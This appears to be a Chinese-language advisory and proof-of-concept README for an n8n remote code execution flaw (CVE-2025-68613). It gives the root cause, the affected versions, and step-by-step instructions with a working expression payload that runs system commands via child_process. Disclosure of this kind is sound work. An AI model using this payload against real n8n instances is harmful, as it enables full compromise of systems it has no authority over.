
CVE-2025-68613的概念验证利用代码,针对n8n工作流自动化工具中的关键RCE漏洞。展示了在1.122.0之前版本中通过表达式求值器绕过实现任意命令执行。
安全公告:n8n 中的严重远程代码执行漏洞(CVE-2025-68613)
已在 n8n 工作流自动化工具中发现一个严重漏洞,可导致任意代码执行。拥有创建或编辑工作流权限的已认证用户可利用此漏洞控制运行 n8n 实例的系统。
| 项目 | 内容 |
|---|---|
| CVE ID | CVE-2025-68613 |
| 漏洞类型 | 动态管理代码资源控制不当 |
| 严重程度 | 严重 |
| 影响 | 任意命令执行、系统完全被控 |
| 根本原因 | 表达式求值器未对底层 Node.js 进程对象(this.process)的访问进行清理,允许攻击者引入并使用 child_process 等系统模块。 |
成功利用此漏洞的攻击者可以实现以下操作:
| 状态 | 版本 |
|---|---|
| 受影响 | 所有低于 1.122.0 的版本 |
| 已修复 | 版本 1.122.0 及更高版本 |
务必立即将 n8n 实例升级至 1.122.0 或更高版本以修复此漏洞。
本目录包含 n8n 远程代码执行(RCE)漏洞(CVE-2025-68613)的概念验证代码。
创建工作流:
添加节点:
配置设置节点:
result。注入漏洞利用载荷:
result 值的表达式字段中粘贴以下载荷:{{ (function(){ return this.process.mainModule.require('child_process').execSync('id').toString() })() }}
执行并验证:
id 命令的输出,从而确认代码已执行。截图 2025-12-23 15:18:56
